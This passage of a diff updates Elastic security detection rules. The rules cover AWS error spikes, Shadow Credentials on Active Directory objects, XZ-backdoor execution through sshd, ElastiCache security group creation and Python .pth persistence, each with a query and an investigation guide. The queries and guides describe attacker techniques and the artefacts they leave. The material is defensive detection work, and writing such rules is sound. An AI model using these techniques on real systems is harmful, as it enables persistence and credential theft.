"machine_learning_job_id": "high_distinct_count_error_message", + "name": "Spike in AWS Error Messages", + "note": "## Triage and analysis\n\n### Investigating Spike in AWS Error Messages\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and understanding what is considered normal behavior within an organization, you can spot suspicious or malicious activity when deviations occur.\n\nThis rule uses a machine learning job to detect a significant spike in the rate of a particular error in the CloudTrail messages. Spikes in error messages may accompany attempts at privilege escalation, lateral movement, or discovery.\n\n#### Possible investigation steps\n\n- Examine the history of the error. If the error only manifested recently, it might be related to recent changes in an automation module or script. You can find the error in the `aws.cloudtrail.error_code field` field.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. These may indicate the source of the program or the nature of the task being performed when the error occurred.\n - Check whether the error is related to unsuccessful attempts to enumerate or access objects, data, or secrets.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal time of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- Examine the history of the command. If the command only manifested recently, it might be part of a new automation module or script. If it has a consistent cadence (for example, it appears in small numbers on a weekly or monthly cadence), it might be part of a housekeeping or maintenance process. You can find the command in the `event.action field` field.\n- The adoption of new services or the addition of new functionality to scripts may generate false positives.\n\n### Related Rules\n\n- Unusual City For an AWS Command - 809b70d3-e2c3-455e-af1b-2626a5a1a276\n- Unusual Country For an AWS Command - dca28dee-c999-400f-b640-50a081cc0fd1\n- Unusual AWS Command for a User - ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1\n- Rare AWS Error Code - 19de8096-e2b0-4bd8-80c9-34a820813fff\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" + ], + "related_integrations": [ + { + "package": "aws", + "version": "^3.0.0" + } + ], + "risk_score": 21, + "rule_id": "78d3d8d9-b476-451d-a9e0-7a5addd70670", + "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from AWS.\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### AWS Integration Setup\nThe AWS integration allows you to collect logs and metrics from Amazon Web Services (AWS) with Elastic Agent.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"aws\" to your system:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAWS\u201d and select the integration to see more details about it.\n- Click \u201cAdd AWS\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201caws\u201d to an existing or a new agent policy, and deploy the agent on your system from which aws log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://www.elastic.co/docs/current/integrations/aws).\n", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1526", + "name": "Cloud Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1526/" + }, + { + "id": "T1580", + "name": "Cloud Infrastructure Discovery", + "reference": "https://attack.mitre.org/techniques/T1580/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [] + } + ], + "type": "machine_learning", + "version": 212 + }, + "id": "78d3d8d9-b476-451d-a9e0-7a5addd70670_212", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_214.json b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_214.json deleted file mode 100644 index f7929db68bf..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_214.json +++ /dev/null @@ -1,96 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identify the modification of the msDS-KeyCredentialLink attribute in an Active Directory Computer or User Object. Attackers can abuse control over the object and create a key pair, append to raw public key in the attribute, and obtain persistent and stealthy access to the target user or computer object.", - "false_positives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions." - ], - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-system.security*", - "logs-windows.forwarded*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Potential Shadow Credentials added to AD Object", - "note": "## Triage and analysis\n\n### Investigating Potential Shadow Credentials added to AD Object\n\nThe msDS-KeyCredentialLink is an Active Directory (AD) attribute that links cryptographic certificates to a user or computer for domain authentication.\n\nAttackers with write privileges on this attribute over an object can abuse it to gain access to the object or maintain persistence. This means they can authenticate and perform actions on behalf of the exploited identity, and they can use Shadow Credentials to request Ticket Granting Tickets (TGTs) on behalf of the identity.\n\n#### Possible investigation steps\n\n- Identify whether Windows Hello for Business (WHfB) and/or Azure AD is used in the environment.\n - Review the event ID 4624 for logon events involving the subject identity (`winlog.event_data.SubjectUserName`).\n - Check whether the `source.ip` is the server running Azure AD Connect.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Review the event IDs 4768 and 4769 for suspicious ticket requests involving the modified identity (`winlog.event_data.ObjectDN`).\n - Extract the source IP addresses from these events and use them as indicators of compromise (IoCs) to investigate whether the host is compromised and to scope the attacker's access to the environment.\n\n### False positive analysis\n\n- Administrators might use custom accounts on Azure AD Connect. If this is the case, make sure the account is properly secured. You can also create an exception for the account if expected activity makes too much noise in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Remove the Shadow Credentials from the object.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. Use this information to determine ways the attacker could regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "event.code:\"5136\" and winlog.event_data.AttributeLDAPDisplayName:\"msDS-KeyCredentialLink\" and\n winlog.event_data.AttributeValue :B\\:828* and\n not winlog.event_data.SubjectUserName: MSOL_*\n", - "references": [ - "https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab", - "https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials", - "https://github.com/OTRF/Set-AuditRule", - "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.AttributeLDAPDisplayName", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.AttributeValue", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.SubjectUserName", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de", - "setup": "## Setup\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```\n", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Active Directory", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1556", - "name": "Modify Authentication Process", - "reference": "https://attack.mitre.org/techniques/T1556/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 214 - }, - "id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de_214", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7afc6cc9-8800-4c7f-be6b-b688d2dea248_6.json b/packages/security_detection_engine/kibana/security_rule/7afc6cc9-8800-4c7f-be6b-b688d2dea248_6.json deleted file mode 100644 index 4efd8cbea7f..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/7afc6cc9-8800-4c7f-be6b-b688d2dea248_6.json +++ /dev/null @@ -1,190 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "It identifies potential malicious shell executions through remote SSH and detects cases where the sshd service suddenly terminates soon after successful execution, suggesting suspicious behavior similar to the XZ backdoor.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.network*", - "logs-endpoint.events.process*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Potential Execution via XZBackdoor", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Execution via XZBackdoor\n\nThe XZBackdoor leverages SSH, a secure protocol for remote access, to execute malicious commands stealthily. Adversaries exploit SSH by initiating sessions that mimic legitimate activity, then abruptly terminate them post-execution to evade detection. The detection rule identifies anomalies by tracking SSH processes that start and end unexpectedly, especially when non-standard executables are invoked, signaling potential backdoor activity.\n\n### Possible investigation steps\n\n- Review the SSH session logs on the affected host to identify any unusual or unauthorized access attempts, focusing on sessions that match the process.pid and process.entity_id from the alert.\n- Examine the command history and executed commands for the user associated with the user.id in the alert to identify any suspicious or unexpected activities.\n- Investigate the non-standard executables invoked by the SSH session by checking the process.executable field to determine if they are legitimate or potentially malicious.\n- Analyze the network activity associated with the SSH session, particularly any disconnect_received events, to identify any unusual patterns or connections to suspicious IP addresses.\n- Check the exit codes of the SSH processes, especially those with a non-zero process.exit_code, to understand the reason for the abrupt termination and whether it aligns with typical error codes or indicates malicious activity.\n\n### False positive analysis\n\n- Legitimate administrative SSH sessions may trigger the rule if they involve non-standard executables. To manage this, create exceptions for known administrative scripts or tools that are frequently used in your environment.\n- Automated processes or scripts that use SSH for routine tasks might mimic the behavior of the XZBackdoor. Identify these processes and exclude them by specifying their executable paths or command-line patterns in the rule exceptions.\n- Security tools or monitoring solutions that perform SSH-based checks could be mistaken for malicious activity. Review these tools and add their signatures to the exclusion list to prevent false alerts.\n- Custom applications that use SSH for communication might be flagged. Document these applications and adjust the rule to recognize their specific execution patterns as non-threatening.\n- Temporary network issues causing abrupt SSH session terminations could be misinterpreted as suspicious behavior. Monitor network stability and consider excluding known transient disconnections from triggering alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected host from the network to prevent further unauthorized access or lateral movement.\n- Terminate any suspicious SSH sessions identified by the detection rule to stop ongoing malicious activity.\n- Conduct a thorough review of the affected host's SSH configuration and logs to identify unauthorized changes or access patterns.\n- Reset credentials for any user accounts involved in the suspicious SSH activity to prevent further unauthorized access.\n- Restore the affected system from a known good backup if any unauthorized changes or malware are detected.\n- Implement network segmentation to limit SSH access to critical systems and reduce the attack surface.\n- Escalate the incident to the security operations center (SOC) for further investigation and to determine if additional systems are compromised.", - "query": "sequence by host.id, user.id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name == \"sshd\" and\n process.args == \"-D\" and process.args == \"-R\"] by process.pid, process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.parent.name == \"sshd\" and\n process.executable != null and not (\n process.executable in (\"/usr/sbin/sshd\", \"/usr/sbin/unix_chkpwd\", \"/usr/bin/google_authorized_keys\", \"/usr/bin/fipscheck\") or\n process.args like (\"rsync*\", \"systemctl*\", \"/usr/sbin/unix_chkpwd\", \"/usr/bin/google_authorized_keys\", \"/usr/sbin/aad_certhandler*\") or\n process.command_line like \"sh -c /usr/bin/env -i PATH=*\"\n )] by process.parent.pid, process.parent.entity_id\n [process where host.os.type == \"linux\" and event.action == \"end\" and process.name == \"sshd\" and process.exit_code != 0] by process.pid, process.entity_id\n [network where host.os.type == \"linux\" and event.type == \"end\" and event.action == \"disconnect_received\" and process.name == \"sshd\"] by process.pid, process.entity_id\n", - "references": [ - "https://github.com/amlweems/xzbot", - "https://access.redhat.com/security/cve/CVE-2024-3094", - "https://www.elastic.co/security-labs/500ms-to-midnight" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.command_line", - "type": "wildcard" - }, - { - "ecs": true, - "name": "process.entity_id", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.executable", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.exit_code", - "type": "long" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.entity_id", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.pid", - "type": "long" - }, - { - "ecs": true, - "name": "process.pid", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "7afc6cc9-8800-4c7f-be6b-b688d2dea248", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Persistence", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1543", - "name": "Create or Modify System Process", - "reference": "https://attack.mitre.org/techniques/T1543/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1556", - "name": "Modify Authentication Process", - "reference": "https://attack.mitre.org/techniques/T1556/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1021", - "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/", - "subtechnique": [ - { - "id": "T1021.004", - "name": "SSH", - "reference": "https://attack.mitre.org/techniques/T1021/004/" - } - ] - }, - { - "id": "T1563", - "name": "Remote Service Session Hijacking", - "reference": "https://attack.mitre.org/techniques/T1563/", - "subtechnique": [ - { - "id": "T1563.001", - "name": "SSH Hijacking", - "reference": "https://attack.mitre.org/techniques/T1563/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 6 - }, - "id": "7afc6cc9-8800-4c7f-be6b-b688d2dea248_6", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_207.json b/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_207.json deleted file mode 100644 index 3dc9d322a58..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/7b3da11a-60a2-412e-8aa7-011e1eb9ed47_207.json +++ /dev/null @@ -1,94 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies when an ElastiCache security group has been created.", - "false_positives": [ - "A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS ElastiCache Security Group Created", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS ElastiCache Security Group Created\n\nAWS ElastiCache security groups control access to cache clusters, ensuring only authorized traffic can interact with them. Adversaries might create new security groups to bypass existing restrictions, facilitating unauthorized access or data exfiltration. The detection rule monitors for successful creation events of these groups, signaling potential defense evasion tactics by identifying unusual or unauthorized configurations.\n\n### Possible investigation steps\n\n- Review the CloudTrail logs for the specific event.action \"Create Cache Security Group\" to identify the user or role that initiated the creation of the ElastiCache security group.\n- Examine the event.provider field to confirm that the event is associated with elasticache.amazonaws.com, ensuring the alert is relevant to ElastiCache services.\n- Check the event.outcome field to verify that the security group creation was successful, confirming the alert's validity.\n- Investigate the IAM permissions and roles associated with the user or entity that created the security group to determine if they have legitimate access and reasons for this action.\n- Analyze the configuration of the newly created ElastiCache security group to identify any overly permissive rules or unusual configurations that could indicate malicious intent.\n- Correlate this event with other recent activities in the AWS account, such as changes to IAM policies or unusual login attempts, to assess if this is part of a broader attack pattern.\n\n### False positive analysis\n\n- Routine administrative actions by authorized personnel can trigger this rule. Regularly review and document legitimate security group creation activities to differentiate them from suspicious actions.\n- Automated processes or scripts that create security groups as part of normal operations may cause false positives. Identify and whitelist these processes to prevent unnecessary alerts.\n- Infrastructure as Code (IaC) tools like Terraform or CloudFormation might create security groups during deployments. Ensure these tools and their actions are well-documented and consider excluding their known patterns from triggering alerts.\n- Development and testing environments often involve frequent creation and deletion of resources, including security groups. Establish separate monitoring rules or exceptions for these environments to reduce noise.\n- Scheduled maintenance or updates that involve security group modifications should be communicated to the security team in advance, allowing them to temporarily adjust monitoring rules or expectations.\n\n### Response and remediation\n\n- Immediately review the newly created ElastiCache security group to verify its necessity and ensure it aligns with organizational security policies. If unauthorized, proceed to delete the security group to prevent potential misuse.\n- Conduct a thorough audit of recent IAM activity to identify any unauthorized access or privilege escalation that may have led to the creation of the security group. Pay special attention to any anomalies in user behavior or access patterns.\n- Isolate any affected ElastiCache instances by temporarily restricting access to them until a full assessment is completed. This helps prevent any potential data exfiltration or unauthorized access.\n- Notify the security operations team and relevant stakeholders about the incident for further investigation and to ensure awareness across the organization.\n- Implement additional monitoring on the AWS account to detect any further unauthorized changes to security groups or other critical configurations, enhancing the detection capabilities for similar threats.\n- Review and update IAM policies and permissions to ensure the principle of least privilege is enforced, reducing the risk of unauthorized security group creation in the future.\n- If the incident is confirmed as malicious, escalate to the incident response team for a comprehensive investigation and to determine if further actions, such as legal or regulatory reporting, are necessary.", - "query": "event.dataset:aws.cloudtrail and event.provider:elasticache.amazonaws.com and event.action:\"Create Cache Security Group\" and\nevent.outcome:success\n", - "references": [ - "https://docs.aws.amazon.com/AmazonElastiCache/latest/APIReference/API_CreateCacheSecurityGroup.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "7b3da11a-60a2-412e-8aa7-011e1eb9ed47", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.007", - "name": "Disable or Modify Cloud Firewall", - "reference": "https://attack.mitre.org/techniques/T1562/007/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "7b3da11a-60a2-412e-8aa7-011e1eb9ed47_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_109.json b/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_109.json index fed20f53fc8..f0fed20cc9e 100644 --- a/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_109.json +++ b/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_109.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/7f65f984-5642-4291-a0a0-2bbefce4c617_4.json b/packages/security_detection_engine/kibana/security_rule/7f65f984-5642-4291-a0a0-2bbefce4c617_4.json new file mode 100644 index 00000000000..5c6f1195577 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7f65f984-5642-4291-a0a0-2bbefce4c617_4.json @@ -0,0 +1,133 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the creation of .pth files in system-wide and user-specific Python package directories, which can be abused for persistent code execution. .pth files automatically execute Python code when the interpreter starts, making them a stealthy persistence mechanism. Monitoring these paths helps identify unauthorized modifications that could indicate persistence by an attacker or malicious package injection.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Python Path File (pth) Creation", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Python Path File (pth) Creation\n\nPython Path Files (.pth) are used to automatically execute code when the Python interpreter starts, making them a potential target for adversaries seeking persistence. Attackers can exploit .pth files by placing malicious code in directories where Python packages reside, ensuring execution each time Python runs. The detection rule monitors the creation and renaming of .pth files in key directories, excluding legitimate processes, to identify unauthorized modifications indicative of malicious activity.\n\n### Possible investigation steps\n\n- Review the file path where the .pth file was created or renamed to determine if it is within a legitimate Python package directory, as specified in the query paths.\n- Identify the process executable responsible for the creation or renaming of the .pth file and verify if it is listed as an excluded legitimate process in the query.\n- Investigate the parent process of the identified executable to understand the context of the .pth file creation and assess if it aligns with expected behavior.\n- Check the timestamp of the .pth file creation or renaming event to correlate with any known scheduled tasks or user activities.\n- Examine the contents of the .pth file to identify any suspicious or unauthorized code that could indicate malicious intent.\n- Review recent system logs and user activity around the time of the event to identify any anomalies or unauthorized access attempts.\n\n### False positive analysis\n\n- Legitimate package installations or updates using package managers like pip or poetry can trigger false positives. To handle this, ensure that the process executables for these package managers are included in the exclusion list.\n- Automated scripts or CI/CD pipelines that manage Python environments might create or rename .pth files. Identify these scripts and add their executables to the exclusion list to prevent unnecessary alerts.\n- System updates or maintenance tasks that involve Python package directories can also result in false positives. Monitor these activities and temporarily adjust the rule or add specific system maintenance processes to the exclusion list.\n- Custom Python applications that manage dependencies or configurations through .pth files may cause alerts. Review these applications and consider adding their specific paths or executables to the exclusion criteria.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further execution of potentially malicious code.\n- Identify and terminate any suspicious processes associated with the creation or modification of .pth files, especially those not matching the legitimate process list.\n- Remove any unauthorized .pth files from the identified directories to eliminate the persistence mechanism.\n- Conduct a thorough review of recent changes to the Python environment and installed packages to identify any malicious or unauthorized modifications.\n- Restore affected systems from a known good backup if malicious activity is confirmed and cannot be fully remediated.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems are affected.\n- Implement enhanced monitoring and alerting for future unauthorized .pth file modifications to quickly detect similar threats.\n", + "query": "file where host.os.type == \"linux\" and event.action in (\"creation\", \"rename\") and file.extension == \"pth\" and\nfile.path like~ (\n \"/usr/local/lib/python*/dist-packages/*\", \n \"/usr/lib/python*/dist-packages/*\",\n \"/usr/local/lib/python*/site-packages/*\",\n \"/usr/lib/python*/site-packages/*\",\n \"/home/*/.local/lib/python*/site-packages/*\",\n \"/opt/*/lib/python*/site-packages/*\"\n) and process.executable != null and not (\n process.executable in (\n \"/usr/local/bin/pip2\", \"/usr/bin/restic\", \"/usr/bin/pacman\", \"/usr/bin/dockerd\", \"/usr/local/bin/pip3\",\n \"/usr/bin/pip3\", \"/usr/local/bin/pip\", \"/usr/bin/pip\", \"/usr/bin/podman\", \"/usr/local/bin/poetry\",\n \"/usr/bin/poetry\", \"/usr/bin/pamac-daemon\", \"/opt/venv/bin/pip\", \"/usr/bin/dnf\", \"./venv/bin/pip\",\n \"/usr/bin/dnf5\", \"/bin/dnf5\", \"/bin/pip\", \"/bin/podman\"\n ) or\n process.executable like~ (\n \"/usr/bin/python*\", \"/usr/local/bin/python*\", \"/opt/venv/bin/python*\",\n \"/nix/store/*libexec/docker/dockerd\", \"/snap/docker/*dockerd\"\n )\n)\n", + "references": [ + "https://dfir.ch/posts/publish_python_pth_extension/", + "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "7f65f984-5642-4291-a0a0-2bbefce4c617", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud 